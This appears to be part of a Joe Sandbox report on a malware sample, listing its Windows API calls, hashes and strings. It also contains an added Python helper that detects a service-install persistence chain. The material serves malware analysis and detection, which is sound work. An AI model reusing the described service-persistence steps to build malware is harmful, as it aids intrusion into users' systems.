                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 175 402914-40291a RegCloseKey 176 40d8a7-40dba7 175->176 178 40dbaa 176->178 178->178
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close
                                                                                      • String ID:
                                                                                      • API String ID: 3535843008-0
                                                                                      • Opcode ID: f5db5590c29d013d9deb5da303e7320bdae192f81683c438447ff80dd5f1286a
                                                                                      • Instruction ID: a672698ba65cf88ccc8542e474dbf54698bfe7b51bb9aee12de0e43c7b427ca3
                                                                                      • Opcode Fuzzy Hash: f5db5590c29d013d9deb5da303e7320bdae192f81683c438447ff80dd5f1286a
                                                                                      • Instruction Fuzzy Hash: E2A00271904514C6D64496949F4859877746504311751407ED152710D0D77C554A651D
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value
                                                                                      • String ID:
                                                                                      • API String ID: 3702945584-0
                                                                                      • Opcode ID: 30ccf38bae0651031a747be385cf41240ce9650c7b68b68cc0c0d266fe80d253
                                                                                      • Instruction ID: 56e8f69265871bb44e1bd22ced2ad85af3968b80b96cf2c0600ba62ef43449e4
                                                                                      • Opcode Fuzzy Hash: 30ccf38bae0651031a747be385cf41240ce9650c7b68b68cc0c0d266fe80d253
                                                                                      • Instruction Fuzzy Hash: 51A00275504404EBCB090B919B0C67C7E31B748305F151069E142704A08B751655AF19
                                                                                      APIs
                                                                                      • CreateServiceA.ADVAPI32(?,?,?,000F01FF), ref: 0040D586
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateService
                                                                                      • String ID:
                                                                                      • API String ID: 1592570254-0
                                                                                      • Opcode ID: b1d535fcba41d0c5bc0ec726a091b62f5efeb8c2f631be5d7d856abec158dcf1
                                                                                      • Instruction ID: 55442d6bb3312950ba1be5e0f5e2ac9e55e18be424259f3225f08959e138762c
                                                                                      • Opcode Fuzzy Hash: b1d535fcba41d0c5bc0ec726a091b62f5efeb8c2f631be5d7d856abec158dcf1
                                                                                      • Instruction Fuzzy Hash: 73C04C74D8C402F6C2210AD00D4983510282585795331083B6E47B44C199B8044FB12F
                                                                                      APIs
                                                                                      • RegisterServiceCtrlHandlerA.ADVAPI32(UID Finder 6.11.66,Function_0000235E), ref: 004023C1
                                                                                      • SetServiceStatus.ADVAPI32(0040C408), ref: 00402420
                                                                                      • GetLastError.KERNEL32 ref: 00402422
                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                                                      • GetLastError.KERNEL32 ref: 00402450
                                                                                      • SetServiceStatus.ADVAPI32(0040C408), ref: 00402480
                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                                                      • CloseHandle.KERNEL32 ref: 004024A1
                                                                                      • SetServiceStatus.ADVAPI32(0040C408), ref: 004024CA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                                      • String ID: UID Finder 6.11.66
                                                                                      • API String ID: 3346042915-245170862
                                                                                      • Opcode ID: 8481bbef3285b0f9ebce9f82f4e1eb68b4ac82d1f0eae4c5cd12d91383da07eb
                                                                                      • Instruction ID: 4f107cf957cbd680cd4d605db27ce117804603c61eb7b626b01e69dba3e91430
                                                                                      • Opcode Fuzzy Hash: 8481bbef3285b0f9ebce9f82f4e1eb68b4ac82d1f0eae4c5cd12d91383da07eb
                                                                                      • Instruction Fuzzy Hash: 3521C570441214EBC2105F16EFE9A267FA8FBC5794B11823EE544B22B2CBB90549CFAD
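Read together, the OpenSCManagerA and CreateServiceA entries above and this function's RegisterServiceCtrlHandlerA / SetServiceStatus / CreateEventA / CreateThread / WaitForSingleObject sequence are the textbook shape of a binary that installs itself as a Windows service and then runs a ServiceMain. The Python triage helper below is an added example and is not part of the Joe Sandbox report or of the analysed sample: it parses report-style API lines (the sample lines are copied from this report; the OpenSCManagerA line is constructed from the control-flow graph entry, since the report's API list for that function is empty), decodes the CreateServiceA dwDesiredAccess value 000F01FF against the documented SERVICE_* access bits, and extracts the service name passed to RegisterServiceCtrlHandlerA. The function names, the ApiCall record and the result dictionary layout are the example's own choices.

```python
"""Triage helper for Joe Sandbox "APIs" lines (added example, not report code)."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample input: API lines copied from the report's service-related
# function records. The OpenSCManagerA line is built from the control-flow
# graph entry (block 40d11d-40d126) because its API list in the report is empty.
SAMPLE_API_LINES = """
• OpenSCManagerA.ADVAPI32 ref: 0040D126
• CreateServiceA.ADVAPI32(?,?,?,000F01FF), ref: 0040D586
• RegisterServiceCtrlHandlerA.ADVAPI32(UID Finder 6.11.66,Function_0000235E), ref: 004023C1
• SetServiceStatus.ADVAPI32(0040C408), ref: 00402420
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
• CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
"""

# One report line: "<Api>.<MODULE>(<args>), ref: <hex>"; args are optional.
API_LINE = re.compile(
    r"^\s*[•*-]?\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Service object access rights (winsvc.h) plus the standard rights that make up
# STANDARD_RIGHTS_REQUIRED; together they form SERVICE_ALL_ACCESS = 0x000F01FF.
SERVICE_ACCESS_BITS = {
    0x0001: "SERVICE_QUERY_CONFIG",
    0x0002: "SERVICE_CHANGE_CONFIG",
    0x0004: "SERVICE_QUERY_STATUS",
    0x0008: "SERVICE_ENUMERATE_DEPENDENTS",
    0x0010: "SERVICE_START",
    0x0020: "SERVICE_STOP",
    0x0040: "SERVICE_PAUSE_CONTINUE",
    0x0080: "SERVICE_INTERROGATE",
    0x0100: "SERVICE_USER_DEFINED_CONTROL",
    0x00010000: "DELETE",
    0x00020000: "READ_CONTROL",
    0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER",
}
SERVICE_ALL_ACCESS = 0x000F01FF


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]   # positional arguments as printed; "?" means unresolved
    ref: int          # address of the call site


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn report API lines into ApiCall records; non-matching lines are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def decode_service_access(mask: int) -> List[str]:
    """Name every access bit set in a service handle's desired-access mask."""
    names = [name for bit, name in sorted(SERVICE_ACCESS_BITS.items()) if mask & bit]
    unknown = mask & ~sum(SERVICE_ACCESS_BITS)
    if unknown:
        names.append(f"UNKNOWN_0x{unknown:08X}")
    return names


def describe_access(mask: int) -> str:
    """Collapse the full mask to its well-known name, otherwise list the bits."""
    if mask == SERVICE_ALL_ACCESS:
        return "SERVICE_ALL_ACCESS"
    return "|".join(decode_service_access(mask)) or "0"


def assess_service_persistence(calls: List[ApiCall]) -> Dict[str, object]:
    """Flag the SCM-open -> CreateService -> ServiceMain chain and pull out details."""
    by_api = {c.api: c for c in calls}
    result: Dict[str, object] = {
        "opens_scm": any(a in by_api for a in ("OpenSCManagerA", "OpenSCManagerW")),
        "installs_service": False,
        "create_service_access": None,
        "has_service_main": False,
        "service_name": None,
    }
    create = by_api.get("CreateServiceA") or by_api.get("CreateServiceW")
    if create:
        result["installs_service"] = True
        # CreateService prototype: hSCManager, lpServiceName, lpDisplayName,
        # dwDesiredAccess, ...; the report prints the recovered args positionally.
        if len(create.args) >= 4 and create.args[3] != "?":
            result["create_service_access"] = describe_access(int(create.args[3], 16))
    reg = by_api.get("RegisterServiceCtrlHandlerA") or by_api.get("RegisterServiceCtrlHandlerW")
    if reg and reg.args and reg.args[0] != "?":
        result["service_name"] = reg.args[0]   # lpServiceName is the first parameter
    result["has_service_main"] = reg is not None and "SetServiceStatus" in by_api
    return result


if __name__ == "__main__":
    for key, value in assess_service_persistence(parse_api_lines(SAMPLE_API_LINES)).items():
        print(f"{key}: {value}")
```

The access decode is the part worth keeping at hand: a 000F01FF mask on CreateService is SERVICE_ALL_ACCESS, which is what an installer requests when it intends to start, stop and reconfigure the service it just created, and it lines up with the SetServiceStatus / CreateThread ServiceMain skeleton shown in the record above.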
                                                                                      APIs
                                                                                      • LCMapStringW.KERNEL32(00000000,00000100,00408650,00000001,00000000,00000000,00000103,00000001,00000000,?,00406357,00200020,00000000,?,00000000,00000000), ref: 004068D9
                                                                                      • LCMapStringA.KERNEL32(00000000,00000100,0040864C,00000001,00000000,00000000,?,00406357,00200020,00000000,?,00000000,00000000,00000001), ref: 004068F5
                                                                                      • LCMapStringA.KERNEL32(?,?,?,?,Wc@ ,?,00000103,00000001,00000000,?,00406357,00200020,00000000,?,00000000,00000000), ref: 0040693E
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00406357,00200020,00000000,?,00000000,00000000), ref: 00406976
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00406357,00200020,00000000,?,00000000), ref: 004069CE
                                                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00406357,00200020,00000000,?,00000000), ref: 004069E4
                                                                                      • LCMapStringW.KERNEL32(?,?,?,00000000,Wc@ ,?,?,00406357,00200020,00000000,?,00000000), ref: 00406A17
                                                                                      • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00406357,00200020,00000000,?,00000000), ref: 00406A7F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$ByteCharMultiWide
                                                                                      • String ID: Wc@
                                                                                      • API String ID: 352835431-4128830131
                                                                                      • Opcode ID: c59ed56cf9200d4eb4cbe2117608f716f3cf8688afb6deb225ba4043c85c6758
                                                                                      • Instruction ID: c30aaca26a5f6a0372154cda3c497b92e07e281ea3e6606adb1712902525b657
                                                                                      • Opcode Fuzzy Hash: c59ed56cf9200d4eb4cbe2117608f716f3cf8688afb6deb225ba4043c85c6758
                                                                                      • Instruction Fuzzy Hash: 8A517E71A00209EBCF219F94CD45ADF7FB5FB49750F11812AF911B12A0D7398921DF69
                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402F74), ref: 00403BFD
                                                                                      • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402F74), ref: 00403C11
                                                                                      • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402F74), ref: 00403C3D
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402F74), ref: 00403C75
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402F74), ref: 00403C97
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402F74), ref: 00403CB0
                                                                                      • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402F74), ref: 00403CC3
                                                                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00403D01
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                      • String ID: t/@
                                                                                      • API String ID: 1823725401-3363397731
                                                                                      • Opcode ID: aff10945ecf90bbee9edc284fe0c12867232451494807f8f70b2732d2a40bc2d
                                                                                      • Instruction ID: 879d38be92084954eaea71e49c87bd85cc2f9a5de8a3f101a3316a48e994b743
                                                                                      • Opcode Fuzzy Hash: aff10945ecf90bbee9edc284fe0c12867232451494807f8f70b2732d2a40bc2d
                                                                                      • Instruction Fuzzy Hash: 3E31017350C2246EE7203F746CC483BBE9CEA4575AB15053FF982F3280DA398E8146AD
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,004043C1,?,Microsoft Visual C++ Runtime Library,00012010,?,00408584,?,004085D4,?,?,?,Runtime Error!Program: ), ref: 004065CA
                                                                                      • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004065E2
                                                                                      • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004065F3
                                                                                      • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00406600
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                      • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                      • API String ID: 2238633743-4044615076
                                                                                      • Opcode ID: 1e827d42bf4979efd8fc0e05e1792a28396127eff3a42ececc528c363af0fc92
                                                                                      • Instruction ID: db39845ca5f1b339293cd545309a4189fd77c948f0b46f5b4ed21715b02f5541
                                                                                      • Opcode Fuzzy Hash: 1e827d42bf4979efd8fc0e05e1792a28396127eff3a42ececc528c363af0fc92
                                                                                      • Instruction Fuzzy Hash: 46018871A40611EFC7208FB5AFC49277EE99B587407061D3FA541F2291DE7B8811CB6D
                                                                                      APIs
                                                                                      • GetStringTypeW.KERNEL32(00000001,00408650,00000001,00000000,00000103,00000001,00000000,00406357,00200020,00000000,?,00000000,00000000,00000001), ref: 0040678D
                                                                                      • GetStringTypeA.KERNEL32(00000000,00000001,0040864C,00000001,?,?,00000000,00000000,00000001), ref: 004067A7
                                                                                      • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00406357,00200020,00000000,?,00000000,00000000,00000001), ref: 004067DB
                                                                                      • MultiByteToWideChar.KERNEL32(Wc@ ,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00406357,00200020,00000000,?,00000000,00000000,00000001), ref: 00406813
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00406869
                                                                                      • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 0040687B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: StringType$ByteCharMultiWide
                                                                                      • String ID: Wc@
                                                                                      • API String ID: 3852931651-4128830131
                                                                                      • Opcode ID: 51aa12949cff19f931a0c8f8e78869120ffa08a7a0a03f1196022c1900c26aa0
                                                                                      • Instruction ID: 956ec2585e1336e719d8d065e8dcf62e24d3c9f54db028b8b8152b0cc77897f4
                                                                                      • Opcode Fuzzy Hash: 51aa12949cff19f931a0c8f8e78869120ffa08a7a0a03f1196022c1900c26aa0
                                                                                      • Instruction Fuzzy Hash: 3F419F72501209EFCF20AF94DD85EAF3B79FB04754F11453AF902F2290C73989248BA9
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 0040430A
                                                                                      • GetStdHandle.KERNEL32(000000F4,00408584,00000000,?,00000000,00000000), ref: 004043E0
                                                                                      • WriteFile.KERNEL32(00000000), ref: 004043E7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$HandleModuleNameWrite
                                                                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                      • API String ID: 3784150691-4022980321
                                                                                      • Opcode ID: efc2387ad9e4ebc715aa49f254a253419fe4c6ba22f87958d70440b8e59437cd
                                                                                      • Instruction ID: d8635e2a7f81e525e6493e1b235b12eebf94c6aed7416e9ae0bb5a91e3b582aa
                                                                                      • Opcode Fuzzy Hash: efc2387ad9e4ebc715aa49f254a253419fe4c6ba22f87958d70440b8e59437cd
                                                                                      • Instruction Fuzzy Hash: ED318572601219AEDF20AA60DE46FDA336CAF85304F1004BFF944B61D1DA78DE448A5D
                                                                                      APIs
                                                                                      • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                                      • GetLastError.KERNEL32 ref: 00401F86
                                                                                      • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                                      • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                                      • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FBF
                                                                                      • GetTickCount.KERNEL32 ref: 00401FFB
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00402061
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                                      • String ID:
                                                                                      • API String ID: 564119183-0
                                                                                      • Opcode ID: cf410bcafb83c3e7ab838bb09d8b52e2eecc876fdde86efd7a07cb304e42b138
                                                                                      • Instruction ID: 6227662f3afde43d5576465443d89a1ce2d87db52467ebd9ddb435d6f9af9923
                                                                                      • Opcode Fuzzy Hash: cf410bcafb83c3e7ab838bb09d8b52e2eecc876fdde86efd7a07cb304e42b138
                                                                                      • Instruction Fuzzy Hash: 68316E31A00255AFDB105FB49F8896F7F68EF45344F10807AFE86F7291DA748845C7A8
                                                                                      APIs
                                                                                      • GetVersionExA.KERNEL32 ref: 00403F0B
                                                                                      • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403F40
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403FA0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                      • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                      • API String ID: 1385375860-4131005785
                                                                                      • Opcode ID: 902e60ade4d92a6391f73bc102fd9c1f1b848196a8b58942b8a92e566e39241b
                                                                                      • Instruction ID: f9b557e5926ae0cb1bea86ca91105dc92f8de38cdcecb6fe0ade7bda32980430
                                                                                      • Opcode Fuzzy Hash: 902e60ade4d92a6391f73bc102fd9c1f1b848196a8b58942b8a92e566e39241b
                                                                                      • Instruction Fuzzy Hash: B6312571D412886DEB319A705C45ADE7F7C8B06309F2400FBE685F62C2E6388FC98B19
                                                                                      APIs
                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00403D6D
                                                                                      • GetFileType.KERNEL32(00000800), ref: 00403E13
                                                                                      • GetStdHandle.KERNEL32(-000000F6), ref: 00403E6C
                                                                                      • GetFileType.KERNEL32(00000000), ref: 00403E7A
                                                                                      • SetHandleCount.KERNEL32 ref: 00403EB1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileHandleType$CountInfoStartup
                                                                                      • String ID:
                                                                                      • API String ID: 1710529072-0
                                                                                      • Opcode ID: dbaca84f47ceea487b5a59e7f7eb21175bc7ba2e308e601fb33fec27d5f53662
                                                                                      • Instruction ID: 9dbc4695f3205ced207c781c98d2c2eecf37425ec268f2c04ee58d1a3995b9ba
                                                                                      • Opcode Fuzzy Hash: dbaca84f47ceea487b5a59e7f7eb21175bc7ba2e308e601fb33fec27d5f53662
                                                                                      • Instruction Fuzzy Hash: 7C5143716046458BD7218F38CD887663FA8AF02B26F15473EE4A2FB2E0C7389A45C74D
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00406357,00200020,00000000,?,00000000), ref: 004069CE
                                                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00406357,00200020,00000000,?,00000000), ref: 004069E4
                                                                                      • LCMapStringW.KERNEL32(?,?,?,00000000,Wc@ ,?,?,00406357,00200020,00000000,?,00000000), ref: 00406A17
                                                                                      • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00406357,00200020,00000000,?,00000000), ref: 00406A7F
                                                                                      • WideCharToMultiByte.KERNEL32(?,00000220,?,00000000,Wc@ ,?,00000000,00000000,?,00000000,?,00406357,00200020,00000000,?,00000000), ref: 00406AA4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$ByteCharMultiWide
                                                                                      • String ID: Wc@
                                                                                      • API String ID: 352835431-4128830131
                                                                                      • Opcode ID: 1312c45284bb9b0df6438f0e9267380287f1a9abf6012680dfeac5a7f92326d3
                                                                                      • Instruction ID: 95b79f799a9dc74ab8783d7474949c37cbdd673329ec6272a6b224a97d77f72f
                                                                                      • Opcode Fuzzy Hash: 1312c45284bb9b0df6438f0e9267380287f1a9abf6012680dfeac5a7f92326d3
                                                                                      • Instruction Fuzzy Hash: C2113A32A00209ABCF229F98CD04ADEBFB6FF49350F11816AF911722A0D3368D61DF54
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,00402EAA), ref: 0040319F
                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 004031AF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                      • API String ID: 1646373207-3105848591
                                                                                      • Opcode ID: 748c3a06171c204e9a1fd50ae91f73f3c4da2d806122e1fde3641ea021038800
                                                                                      • Instruction ID: 8ffc782c345fbc4a568335a89d7931e33654b4b0dba7f91db9b0a41dc5523864
                                                                                      • Opcode Fuzzy Hash: 748c3a06171c204e9a1fd50ae91f73f3c4da2d806122e1fde3641ea021038800
                                                                                      • Instruction Fuzzy Hash: 25C08C70381B01A6EE602FB22F09B172C0C1B48B43F1800BE7A89F81C0CE7CC208813D
                                                                                      APIs
                                                                                      • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,0040407A), ref: 00404C7D
                                                                                      • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,0040407A), ref: 00404CA1
                                                                                      • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,0040407A), ref: 00404CBB
                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,0040407A), ref: 00404D7C
                                                                                      • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,0040407A), ref: 00404D93
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual$FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 714016831-0
                                                                                      • Opcode ID: 5cad5202a8731f25dba6dd4aaf0d633060e84280589fe69eb585605416c69a03
                                                                                      • Instruction ID: 2da35cf39901cd0166ef30884cd3fae4f1f30d489fd3d975fdb0eff0fbde1f7b
                                                                                      • Opcode Fuzzy Hash: 5cad5202a8731f25dba6dd4aaf0d633060e84280589fe69eb585605416c69a03
                                                                                      • Instruction Fuzzy Hash: 5531E2B15017019BE3208F28EE44B22B7A4EBC8754F11863EEA55B73E1E778AC44CB5C
                                                                                      APIs
                                                                                      • VirtualFree.KERNEL32(?,00008000,00004000,7591DFF0,?,00000000), ref: 004046D6
                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00404731
                                                                                      • HeapFree.KERNEL32(00000000,?), ref: 00404743
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$Virtual$Heap
                                                                                      • String ID: t/@
                                                                                      • API String ID: 2016334554-3363397731
